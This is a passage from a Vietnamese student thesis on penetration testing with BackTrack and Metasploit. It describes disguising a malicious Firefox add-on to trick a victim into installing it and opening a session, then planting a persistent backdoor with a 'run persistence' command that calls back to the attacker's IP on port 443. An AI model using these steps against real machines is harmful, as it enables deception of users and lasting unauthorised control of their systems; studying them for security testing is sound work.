  • 30. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 22 SVTH: Nguyễn Văn Tiến Tiếp theo là chúng ta đặt tên cho addon để nạn nhân tưởng đây là addon của firefox : “set addonname [tên addon]. Đường dẫn chứa file addon đó “set uripath /” và sử dụng exploit để bắt đầu lắng nge. Sau khi exploit thì nó tạo ra 1 đường dẫn. Nếu nạn nhân sử dụng firefox truy cập vào đường dẫn này và cài add on thì sẽ có 1 kết nối đến Honeypot. Có 1 sesions đã được mở.
  • 31. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 23 SVTH: Nguyễn Văn Tiến “Sessions –i 1” để kết nối đến máy nạn nhân. Và chúng ta đã chiếm được hệ thống của nạn nhân. 3. Backdoor Backdoor là một chương trình được hacker cài vào máy tính nạn nhân có thể truy cập vào thời gian sau cho dù lần xâm nhập trước đó đã bị phát hiện. Cách thực hiện: Tạo thêm một dịch vụ mới có tên “rất hệ thống”, gỡ bỏ một dịch vụ ít sử dụng và cài backdoor với chính tên đó. Sauk hi chúng ta chiếm được quyền hệ thống và muốn lần sau máy nạn nhân sẽ tự kết nối đến mà không phải tốn thời gian khai tấn công như thế nữa. Chúng ta sử dụng backdoor có sẳn trên Metasploit là persistence. Xem các trợ giúp của backdoor persistence bằng lệnh: “run persistence –h”
  • 32. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 24 SVTH: Nguyễn Văn Tiến Tiếp theo ta thực hiện : “run persistence –A –U -1 10 –p 443 –r [ip của attacker] Và ta thấy có thêm 1 sessions đã được tạo ra. Ta thoát khỏi sessions. Khi mỗi lần nạn nhân mở máy lên thì sẽ có 1 sesions mới được tạo ra.
  • 33. Đề tài: Nghiên cứu và sử dụng BackTrack để kiểm tra an ninh mạng GVHD: Võ Đỗ Thắng Trang | 25 SVTH: Nguyễn Văn Tiến Bây giờ ta có thể khai thác trên máy nạn nhân.